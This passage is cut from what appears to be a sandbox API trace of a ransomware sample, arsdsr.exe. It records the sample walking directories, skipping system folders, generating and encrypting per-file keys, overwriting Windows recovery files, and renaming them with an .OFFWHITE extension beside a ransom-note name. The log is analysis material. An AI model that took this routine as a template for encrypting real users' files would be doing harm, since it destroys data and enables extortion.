dwReserved1=0xdd354335, cFileName="Admin", cAlternateFileName="")) returned 0 [0088.014] FindClose (in: hFindFile=0x5446d0 | out: hFindFile=0x5446d0) returned 1 [0088.014] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6ba57e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6ba57e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2=".") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="..") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="...") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="windows") returned -1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="$recycle.bin") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="rsa") returned -1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="ntuser.dat") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="programdata") returned -1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="appdata") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files", lpString2="program files") returned 0 [0088.014] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0088.014] lstrcmpiW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files (x86)", lpString2="...") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files (x86)", lpString2="windows") returned -1 [0088.014] lstrcmpiW (lpString1="Program Files (x86)", lpString2="$recycle.bin") returned 1 [0088.014] lstrcmpiW (lpString1="Program Files (x86)", lpString2="rsa") returned -1 [0088.015] lstrcmpiW (lpString1="Program Files (x86)", lpString2="ntuser.dat") returned 1 [0088.015] lstrcmpiW (lpString1="Program Files (x86)", lpString2="programdata") returned -1 [0088.015] lstrcmpiW (lpString1="Program Files (x86)", lpString2="appdata") returned 1 [0088.015] lstrcmpiW (lpString1="Program Files (x86)", lpString2="program files") returned 1 [0088.015] lstrcmpiW (lpString1="Program Files (x86)", lpString2="program files (x86)") returned 0 [0088.015] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0088.015] lstrcmpiW (lpString1="ProgramData", lpString2=".") returned 1 [0088.015] lstrcmpiW (lpString1="ProgramData", lpString2="..") returned 1 [0088.015] lstrcmpiW (lpString1="ProgramData", lpString2="...") returned 1 [0088.015] lstrcmpiW (lpString1="ProgramData", lpString2="windows") returned -1 [0088.015] lstrcmpiW (lpString1="ProgramData", lpString2="$recycle.bin") returned 1 [0088.015] lstrcmpiW (lpString1="ProgramData", lpString2="rsa") returned -1 [0088.015] lstrcmpiW (lpString1="ProgramData", lpString2="ntuser.dat") returned 1 [0088.015] lstrcmpiW (lpString1="ProgramData", lpString2="programdata") returned 0 [0088.015] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2=".") returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="..") returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="...") returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="windows") returned -1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="$recycle.bin") returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="rsa") returned -1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="ntuser.dat") returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="programdata") returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="appdata") returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="program files") returned 1 [0088.015] lstrcmpiW (lpString1="Recovery", lpString2="program files (x86)") returned 1 [0088.016] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0088.016] lstrcatW (in: lpString1="C:/", lpString2="Recovery" | out: lpString1="C:/Recovery") returned="C:/Recovery" [0088.016] lstrcatW (in: lpString1="C:/Recovery", lpString2="\\" | out: lpString1="C:/Recovery\\") returned="C:/Recovery\\" [0088.016] lstrcpyW (in: lpString1=0x295f6f0, lpString2="C:/Recovery\\" | out: lpString1="C:/Recovery\\") returned="C:/Recovery\\" [0088.016] lstrcatW (in: lpString1="C:/Recovery\\", lpString2="*.*" | out: lpString1="C:/Recovery\\*.*") returned="C:/Recovery\\*.*" [0088.016] FindFirstFileW (in: lpFileName="C:/Recovery\\*.*", lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName=".", cAlternateFileName="")) returned 0x5446d0 [0088.017] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0088.017] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName="..", cAlternateFileName="")) returned 1 [0088.017] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0088.017] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0088.017] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3896bb9e, dwReserved1=0xdd354335, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0088.017] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2=".") returned 1 [0088.017] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="..") returned 1 [0088.017] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="...") returned 1 [0088.017] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="windows") returned -1 [0088.017] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="$recycle.bin") returned 1 [0088.018] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="rsa") returned -1 [0088.018] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="ntuser.dat") returned -1 [0088.018] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="programdata") returned -1 [0088.018] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="appdata") returned 1 [0088.018] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="program files") returned -1 [0088.018] lstrcmpiW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="program files (x86)") returned -1 [0088.018] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Recovery\\" | out: lpString1="C:/Recovery\\") returned="C:/Recovery\\" [0088.018] lstrcatW (in: lpString1="C:/Recovery\\", lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0088.018] lstrcatW (in: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="\\" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0088.018] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0088.018] lstrcatW (in: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="*.*" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*" [0088.018] FindFirstFileW (in: lpFileName="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName=".", cAlternateFileName="")) returned 0x544690 [0088.018] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0088.018] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="..", cAlternateFileName="")) returned 1 [0088.018] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0088.018] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0088.018] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0088.018] lstrcmpiW (lpString1="boot.sdi", lpString2=".") returned 1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="..") returned 1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="...") returned 1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="windows") returned -1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="$recycle.bin") returned 1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="rsa") returned -1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="ntuser.dat") returned -1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="programdata") returned -1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="appdata") returned 1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="program files") returned -1 [0088.019] lstrcmpiW (lpString1="boot.sdi", lpString2="program files (x86)") returned -1 [0088.019] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0088.019] lstrcatW (in: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="boot.sdi" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0088.019] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.019] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.019] PathFindExtensionW (pszPath="boot.sdi") returned=".sdi" [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".exe") returned 1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".log") returned 1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".cab") returned 1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".cmd") returned 1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".com") returned 1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".cpl") returned 1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".ini") returned 1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".dll") returned 1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".url") returned -1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".ttf") returned -1 [0088.019] lstrcmpiW (lpString1=".sdi", lpString2=".mp3") returned 1 [0088.020] lstrcmpiW (lpString1=".sdi", lpString2=".pif") returned 1 [0088.020] lstrcmpiW (lpString1=".sdi", lpString2=".mp4") returned 1 [0088.020] lstrcmpiW (lpString1=".sdi", lpString2=".OFFWHITE") returned 1 [0088.020] lstrcmpiW (lpString1=".sdi", lpString2=".msi") returned 1 [0088.020] lstrcmpiW (lpString1="boot.sdi", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0088.020] GetProcessHeap () returned 0x500000 [0088.020] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547dd8 [0088.020] CreateFileW (lpFileName="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0088.020] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=3170304) returned 1 [0088.020] GetProcessHeap () returned 0x500000 [0088.020] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0088.020] GetProcessHeap () returned 0x500000 [0088.020] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0088.020] GetProcessHeap () returned 0x500000 [0088.020] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0088.021] GetProcessHeap () returned 0x500000 [0088.021] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0088.021] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.021] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.021] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0088.021] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.021] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.021] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0088.021] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.021] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.021] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e990*=0x100) returned 1 [0088.021] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.021] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.021] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0088.022] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x306000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.022] SetLastError (dwErrCode=0x0) [0088.022] WriteFile (in: hFile=0x220, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0088.025] GetLastError () returned 0x0 [0088.025] GetLastError () returned 0x0 [0088.025] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x306100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.025] WriteFile (in: hFile=0x220, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0088.025] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x306200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.025] WriteFile (in: hFile=0x220, lpBuffer=0x547dd8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x547dd8*, lpNumberOfBytesWritten=0x295ebcc*=0x8, lpOverlapped=0x0) returned 1 [0088.025] GetProcessHeap () returned 0x500000 [0088.025] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2960020 [0088.026] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.026] ReadFile (in: hFile=0x220, lpBuffer=0x2960020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesRead=0x295ebc0*=0x927c0, lpOverlapped=0x0) returned 1 [0088.091] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.091] WriteFile (in: hFile=0x220, lpBuffer=0x2960020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesWritten=0x295ebcc*=0x927c0, lpOverlapped=0x0) returned 1 [0088.094] GetProcessHeap () returned 0x500000 [0088.094] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960020 | out: hHeap=0x500000) returned 1 [0088.098] CloseHandle (hObject=0x220) returned 1 [0088.375] GetProcessHeap () returned 0x500000 [0088.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0088.375] GetProcessHeap () returned 0x500000 [0088.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0088.375] GetProcessHeap () returned 0x500000 [0088.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0088.375] GetProcessHeap () returned 0x500000 [0088.375] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0088.375] lstrcpyW (in: lpString1=0x295e9b8, lpString2="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" [0088.375] lstrcatW (in: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpString2=".OFFWHITE" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.OFFWHITE") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.OFFWHITE" [0088.375] MoveFileW (lpExistingFileName="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.OFFWHITE" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.offwhite")) returned 1 [0088.376] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2=".") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="..") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="...") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="windows") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="$recycle.bin") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="rsa") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="ntuser.dat") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="programdata") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="appdata") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="program files") returned 1 [0088.376] lstrcmpiW (lpString1="Winre.wim", lpString2="program files (x86)") returned 1 [0088.376] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0088.376] lstrcatW (in: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="Winre.wim" | out: lpString1="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0088.376] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.376] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0088.376] PathFindExtensionW (pszPath="Winre.wim") returned=".wim" [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".exe") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".log") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".cab") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".cmd") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".com") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".cpl") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".ini") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".dll") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".url") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".ttf") returned 1 [0088.376] lstrcmpiW (lpString1=".wim", lpString2=".mp3") returned 1 [0088.377] lstrcmpiW (lpString1=".wim", lpString2=".pif") returned 1 [0088.377] lstrcmpiW (lpString1=".wim", lpString2=".mp4") returned 1 [0088.377] lstrcmpiW (lpString1=".wim", lpString2=".OFFWHITE") returned 1 [0088.377] lstrcmpiW (lpString1=".wim", lpString2=".msi") returned 1 [0088.377] lstrcmpiW (lpString1="Winre.wim", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0088.377] GetProcessHeap () returned 0x500000 [0088.377] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547de8 [0088.377] CreateFileW (lpFileName="C:/Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0088.382] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=169213970) returned 1 [0088.382] GetProcessHeap () returned 0x500000 [0088.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0088.382] GetProcessHeap () returned 0x500000 [0088.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0088.382] GetProcessHeap () returned 0x500000 [0088.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0088.382] GetProcessHeap () returned 0x500000 [0088.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0088.382] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0088.382] 